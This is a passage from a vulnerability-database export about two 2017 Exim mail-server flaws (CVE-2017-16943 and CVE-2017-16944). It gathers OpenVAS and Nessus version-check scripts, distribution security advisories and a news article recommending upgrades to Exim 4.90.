without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:exim:exim';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140539\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-27 09:50:38 +0700 (Mon, 27 Nov 2017)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2017-16943\", \"CVE-2017-16944\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Exim Multiple RCE Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SMTP problems\");\n script_dependencies(\"gb_exim_detect.nasl\");\n script_require_ports(\"Services/smtp\", 25);\n script_mandatory_keys(\"exim/installed\");\n\n script_tag(name:\"summary\", value:\"Exim is prone to multiple remote code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Exim is prone to multiple remote code execution vulnerabilities:\n\n - Use-after-free vulnerability while reading mail header (CVE-2017-16943)\n\n - Exim handles BDAT data incorrectly and leads to crash (CVE-2017-16944)\");\n\n script_tag(name:\"impact\", value:\"A remote attacker may execute arbitrary commands or conduct a denial of\nservice attack.\");\n\n script_tag(name:\"affected\", value:\"Exim version 4.88 and 4.89.\");\n\n script_tag(name:\"solution\", value:\"Apply the provided patch or update to version 4.90 or later. As a\nmitigation set 'chunking_advertise_hosts = ' in the Exim configuration.\");\n\n script_xref(name:\"URL\", value:\"https://lists.exim.org/lurker/message/20171125.034842.d1d75cac.en.html\");\n script_xref(name:\"URL\", value:\"https://bugs.exim.org/show_bug.cgi?id=2199\");\n script_xref(name:\"URL\", value:\"https://bugs.exim.org/show_bug.cgi?id=2201\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"4.88\", test_version2: \"4.89\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:47", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-12-14T00:00:00", "id": "OPENVAS:1361412562310873907", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873907", "title": "Fedora Update for exim FEDORA-2017-0053bb9719", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_0053bb9719_exim_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for exim FEDORA-2017-0053bb9719\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873907\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-14 11:43:09 +0100 (Thu, 14 Dec 2017)\");\n script_cve_id(\"CVE-2017-16944\", \"CVE-2017-16943\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for exim FEDORA-2017-0053bb9719\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"exim on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-0053bb9719\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TAGJVKGVJ2IPU7WWYURQ7TGTN7XZT66N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.89~7.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-11-30T00:00:00", "id": "OPENVAS:1361412562310843388", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843388", "title": "Ubuntu Update for exim4 USN-3499-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3499_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for exim4 USN-3499-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843388\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-30 07:35:30 +0100 (Thu, 30 Nov 2017)\");\n script_cve_id(\"CVE-2017-16944\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for exim4 USN-3499-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that Exim incorrectly\n handled certain BDAT data headers. A remote attacker could possibly use this\n issue to cause Exim to crash, resulting in a denial of service.\");\n script_tag(name:\"affected\", value:\"exim4 on Ubuntu 17.10,\n Ubuntu 17.04\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3499-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3499-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(17\\.10|17\\.04)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.89-5ubuntu1.2\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.89-5ubuntu1.2\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.88-5ubuntu1.3\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.88-5ubuntu1.3\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-11-28T00:00:00", "id": "OPENVAS:1361412562310843380", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843380", "title": "Ubuntu Update for exim4 USN-3493-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3493_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for exim4 USN-3493-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843380\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-28 07:19:15 +0100 (Tue, 28 Nov 2017)\");\n script_cve_id(\"CVE-2017-16943\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for exim4 USN-3493-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that Exim incorrectly\n handled memory in the ESMTP CHUNKING extension. A remote attacker could use this\n issue to cause Exim to crash, resulting in a denial of service, or possibly\n execute arbitrary code. The default compiler options for affected releases\n should reduce the vulnerability to a denial of service.\");\n script_tag(name:\"affected\", value:\"exim4 on Ubuntu 17.10,\n Ubuntu 17.04\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3493-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3493-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(17\\.10|17\\.04)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.89-5ubuntu1.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.89-5ubuntu1.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.88-5ubuntu1.2\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.88-5ubuntu1.2\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:43", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2017-12-07T00:00:00", "id": "OPENVAS:1361412562310851658", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851658", "title": "SuSE Update for exim openSUSE-SU-2017:3220-1 (exim)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2017_3220_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for exim openSUSE-SU-2017:3220-1 (exim)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851658\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-07 07:41:36 +0100 (Thu, 07 Dec 2017)\");\n script_cve_id(\"CVE-2017-16943\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for exim openSUSE-SU-2017:3220-1 (exim)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"This update for exim fixes the following issues:\n\n Security issue fixed:\n\n - CVE-2017-16943: Fix possible remote code execution (boo#1069857).\");\n script_tag(name:\"affected\", value:\"exim on openSUSE Leap 42.3, openSUSE Leap 42.2\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:3220_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSELeap42\\.2|openSUSELeap42\\.3)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"openSUSELeap42.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.86.2~10.9.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"exim-debuginfo\", rpm:\"exim-debuginfo~4.86.2~10.9.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"exim-debugsource\", rpm:\"exim-debugsource~4.86.2~10.9.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"eximon\", rpm:\"eximon~4.86.2~10.9.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"eximon-debuginfo\", rpm:\"eximon-debuginfo~4.86.2~10.9.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"eximstats-html\", rpm:\"eximstats-html~4.86.2~10.9.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"openSUSELeap42.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.86.2~17.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"exim-debuginfo\", rpm:\"exim-debuginfo~4.86.2~17.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"exim-debugsource\", rpm:\"exim-debugsource~4.86.2~17.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"eximon\", rpm:\"eximon~4.86.2~17.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"eximon-debuginfo\", rpm:\"eximon-debuginfo~4.86.2~17.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"eximstats-html\", rpm:\"eximstats-html~4.86.2~17.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2019-05-29T19:20:27", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nUse-after-free in receive_msg function via vectors involving BDAT commands \nThe receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free) via vectors involving BDAT commands. ([CVE-2017-16943 __](<https://access.redhat.com/security/cve/CVE-2017-16943>))\n\nInfinite loop and stack exhaustion in receive_msg function via vectors involving BDAT commands \nThe receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to cause a denial of service (infinite loop and stack exhaustion) via vectors involving BDAT commands and an improper check for a '.' character signifying the end of the content, related to the bdat_getc function. ([CVE-2017-16944 __](<https://access.redhat.com/security/cve/CVE-2017-16944>))\n\n \n**Affected Packages:** \n\n\nexim\n\n \n**Issue Correction:** \nRun _yum update exim_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n exim-mysql-4.89-4.17.amzn1.i686 \n exim-greylist-4.89-4.17.amzn1.i686 \n exim-debuginfo-4.89-4.17.amzn1.i686 \n exim-pgsql-4.89-4.17.amzn1.i686 \n exim-mon-4.89-4.17.amzn1.i686 \n exim-4.89-4.17.amzn1.i686 \n \n src: \n exim-4.89-4.17.amzn1.src \n \n x86_64: \n exim-debuginfo-4.89-4.17.amzn1.x86_64 \n exim-4.89-4.17.amzn1.x86_64 \n exim-greylist-4.89-4.17.amzn1.x86_64 \n exim-mysql-4.89-4.17.amzn1.x86_64 \n exim-pgsql-4.89-4.17.amzn1.x86_64 \n exim-mon-4.89-4.17.amzn1.x86_64 \n \n \n", "modified": "2017-12-21T22:55:00", "published": "2017-12-21T22:55:00", "id": "ALAS-2017-932", "href": "https://alas.aws.amazon.com/ALAS-2017-932.html", "title": "Critical: exim", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2018-01-27T09:17:26", "bulletinFamily": "info", "description": "[](<https://3.bp.blogspot.com/-abbeag4Q8jw/WhvW6RCqcYI/AAAAAAAAu50/5KDDLazACG42ixs4AotBRc9-c_sJ7G82QCLcBGAs/s1600/exim-hacking.png>)\n\nA security researcher has discovered and publicly disclosed two critical vulnerabilities in the popular Internet mail message transfer agent** Exim**, one of which could allow a remote attacker to execute malicious code on the targeted server. \n \nExim is an open source mail transfer agent (MTA) developed for Unix-like operating systems such as Linux, Mac OSX or Solaris, which is responsible for routing, delivering and receiving email messages. \n \nThe first vulnerability, identified as [CVE-2017-16943](<https://bugs.exim.org/show_bug.cgi?id=2199>), is a use-after-free bug which could be exploited to remotely execute arbitrary code in the SMTP server by crafting a sequence of BDAT commands. \n\n\n> \"To trigger this bug, BDAT command is necessary to perform an allocation by raising an error,\" the researcher said. \"Through our research, we confirm that this vulnerability can be exploited to remote code execution if the binary is not compiled with PIE.\"\n\nThe researcher ([mehqq_](<https://twitter.com/mehqq_>)) has also published a Proof-of-Concept (PoC) exploit code written in python that could allow anyone to gain code execution on vulnerable Exim servers. \n \nThe second vulnerability, identified as [CVE-2017-16944](<https://bugs.exim.org/show_bug.cgi?id=2201>), is a denial of service (DoS) flaw that could allow a remote attacker to hang Exim servers even the connection is closed by forcing it to run in an infinite loop without crashing. \n \nThe flaw exists due to improper checking for a '.' character to signify the end of an email when parsing the BDAT data header. \n\n\n> \"The receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to cause a denial of service (infinite loop and stack exhaustion) via vectors involving BDAT commands and an improper check for a '.' character signifying the end of the content, related to the bdat_getc function,\" the vulnerability [description](<https://nvd.nist.gov/vuln/detail/CVE-2017-16944>) reads.\n\nThe researcher has also included a proof-of-concept (PoC) exploit for this vulnerability as well, making Exim server run out of stack and crash. \n \nBoth vulnerabilities reside in Exim version 4.88 and 4.89, and sysadmins are recommended to update their mail transfer agent application [Exim version 4.90](<https://github.com/Exim/exim>) released on GitHub.\n", "modified": "2017-11-27T11:13:58", "published": "2017-11-26T22:54:00", "id": "THN:EE92331B07B64A7332ABABDA5C30ACC1", "href": "https://thehackernews.com/2017/11/exim-internet-mailer-flaws.html", "type": "thn", "title": "Exim Internet Mailer Found Vulnerable to RCE And DoS Bugs; Patch Now", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2019-05-30T02:22:58", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4053-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nNovember 30, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : exim4\nCVE ID : CVE-2017-16943 CVE-2017-16944\nDebian Bug : 882648 882671\n\nSeveral vulnerabilities have been discovered in Exim, a mail transport\nagent. The Common Vulnerabilities and Exposures project identifies the\nfollowing issues:\n\nCVE-2017-16943\n\n A use-after-free vulnerability was discovered in Exim&#x27;s routines\n responsible for parsing mail headers. A remote attacker can take\n advantage of this flaw to cause Exim to crash, resulting in a denial\n of service, or potentially for remote code execution.\n\nCVE-2017-16944\n\n It was discovered that Exim does not properly handle BDAT data\n headers allowing a remote attacker to cause Exim to crash, resulting\n in a denial of service.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 4.89-2+deb9u2. Default installations disable advertising the\nESMTP CHUNKING extension and are not affected by these issues.\n\nWe recommend that you upgrade your exim4 packages.\n\nFor the detailed security status of exim4 please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/exim4\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2017-11-30T08:03:04", "published": "2017-11-30T08:03:04", "id": "DEBIAN:DSA-4053-1:6BF76", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00316.html", "title": "[SECURITY] [DSA 4053-1] exim4 security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-12-13T06:52:37", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in Exim, a mail transport\nagent. The Common Vulnerabilities and Exposures project identifies the\nfollowing issues :\n\n - CVE-2017-16943\n A use-after-free vulnerability was discovered in Exim", "modified": "2019-12-02T00:00:00", "id": "DEBIAN_DSA-4053.NASL", "href": "https://www.tenable.com/plugins/nessus/104940", "published": "2017-12-01T00:00:00", "title": "Debian DSA-4053-1 : exim4 - security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4053. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104940);\n script_version(\"3.6\");\n script_cvs_date(\"Date: 2019/04/10 16:10:16\");\n\n script_cve_id(\"CVE-2017-16943\", \"CVE-2017-16944\");\n script_xref(name:\"DSA\", value:\"4053\");\n\n script_name(english:\"Debian DSA-4053-1 : exim4 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in Exim, a mail transport\nagent. The Common Vulnerabilities and Exposures project identifies the\nfollowing issues :\n\n - CVE-2017-16943\n A use-after-free vulnerability was discovered in Exim's\n routines responsible for parsing mail headers. A remote\n attacker can take advantage of this flaw to cause Exim\n to crash, resulting in a denial of service, or\n potentially for remote code execution.\n\n - CVE-2017-16944\n It was discovered that Exim does not properly handle\n BDAT data headers allowing a remote attacker to cause\n Exim to crash, resulting in a denial of service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=882648\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=882671\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-16943\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-16944\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2017/dsa-4053\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the exim4 packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 4.89-2+deb9u2. Default installations 